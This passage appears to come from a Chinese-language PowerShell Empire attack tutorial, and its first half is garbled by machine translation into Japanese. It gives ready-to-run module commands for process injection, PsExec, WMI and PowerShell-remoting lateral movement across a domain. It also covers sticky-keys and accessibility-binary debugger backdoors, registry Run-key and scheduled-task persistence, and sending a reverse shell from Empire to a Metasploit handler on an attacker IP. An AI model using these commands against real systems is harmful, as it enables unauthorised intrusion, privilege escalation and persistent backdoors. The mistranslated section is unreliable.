セッションの注射
私たちは、アクセス権を取得し、usemodule管理/ psinject注入モジュールを処理するために使用することができます
リスナーの設定およびこれら2つのパラメータをPROCID、PROCIDここでPIDのCMD前に、ドメインのユーザー権利のシェルに跳ね返るということです
usemodule管理/ psinject
設定リスナーMicr067
PROCID 3768セット
実行
3.Invoke、PsExecは
PsExecはの欠点は、検出ログインしたままになり、管理者$ 445ポート共有を開く必要がありますすることができ、基本的なアンチウイルスソフトウェアです。
利点は、あなたが直接SYSTEM権限に戻ることができます。
このモジュールの前提が既にローカル管理者権限、あるいはドメイン管理者アカウントを取得し、その後、さらに、ネットワーク全体に浸透させるために継続して使用してください。
私たちは、それが現在のエージェントになります前に、図に示すように、サーバWIN-PC2と呼ばれるマシンは、そこにあるテスト。
別のマシンのモジュールusemodule lateral_movement / invoke_psexecアート浸透を使用します
マシン名はマシンの完全な名前であるに注意を払う、マシンの名の下に、ここで設定し、聞くには、コマンドが正常に新しいセッションを取得完了します
設定コンピューターWIN-DC.payload.com
設定リスナーMicr067
実行
私は最後のセッション管理者権限であったため、権限を昇格するには、システム管理者の権限に直接PSEXECモジュールを使用
4.Invoke、WMI
PsExecはよりWMIセキュリティは、すべてのウィンドウシステムは、攻撃者がWindowsオペレーティングシステムのデフォルトは、ログに記録されることはありません、攻撃するwmiexecを使用するサービスを、有効、これは何のログが攻撃のスクリプトを記述することなく、攻撃するために行われていない、とすることができることを意味し高隠蔽して、ディスクへ。しかし、ファイアウォールは接続されませんオンになっています。
usemodule lateral_movement / invoke_wmi
設定リスナーMicr067
実行
WMI还有一个usemodule lateral_movement/invoke_wmi_debugger模块,是使用WMI去设置五个Windows Accessibility可执行文件中任意一个的调试器。这些可执行文件包括sethc.exe(粘滞键,五下shift可触发),narrator.exe(文本转语音,Utilman接口激活)、Utilman.exe(windows辅助管理器,Win+U启用),Osk.exe(虚拟键盘,Utilman接口启用)、Magnify.exe(放大镜,Utilman接口启用)。相关配置参数如下:
5.Powershell Remoting
PowerShell remoting是Powershell的远程管理功能,开启Windows远程管理服务WinRM会监听5985端口,该服务默认在Windows Server 2012中是启动的,在Windows Server 2003、2008和2008 R2需要通过手动启动。
如果目标主机启用了PSRemoting,或者拥有启用它的权限的凭据,则可以使用他来进行横向渗透,
开启PowerShell remoting功能
Enable-PSRemoting
usemodule lateral_movement/invoke_psremoting
set ComputerName WIN-PC2.payload.com
set Listener Micr067
execute
0×08. 后门
1.权限持久性劫持shift后门
usemodule lateral_movement/invoke_wmi_debugger
set ComputerName WIN-DC.payload.com
set TargetBinary sethc.exe
execute
运行后,在目标主机远程登录窗口按5次shift即可触发后门,即可进入cmd命令窗口。
注意:sethc.exe也可替换为以下选项。
A.Utilman.exe(快捷键为: Win + U)
B.osk.exe(屏幕上的键盘Win + U启动再选择)
C.Narrator.exe (启动讲述人Win + U启动再选择)
D.Magnify.exe(放大镜Win + U启动再选择)
2.注册表注入后门
使用usemodule persistence/userland/registry模块,运行后会在目标主机启动项添加一个命令
usemodule persistence/userland/registry
set Listener Micr067
set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
execute
运行后当我们登陆系统时候就会运行,反弹回来
3.计划任务获得系统权限
在实际渗透中,运行该模块时杀软会有提示。
usemodule persistence/elevated/schtasks
Set DailyTime 22:50
set Listener Micr067
execute
命令执行完毕返回一个高权限的shell
这里如果把set RegPath 的参数改为HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run,那么就会在22:35分添加一个注册表注入后门。
0×09. Empire反弹回Metasploit
实际渗透中,当拿到webshell上传的MSF客户端无法绕过目标机杀软时,可以使用powershell来绕过也可以执行Empire的payload来绕过,成功之后再使用Empire的模块将其反弹回Metasploit。
usemodule code_execution/invoke_shellcode
set Lhost 192.168.190.133 # Lhost为msf所在主机ip
set Lport 1521
execute
在MSF上设置监听,运行后,就可以收到Empire反弹回来的shell了
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set Lhost 192.168.190.133
set lport 1521
run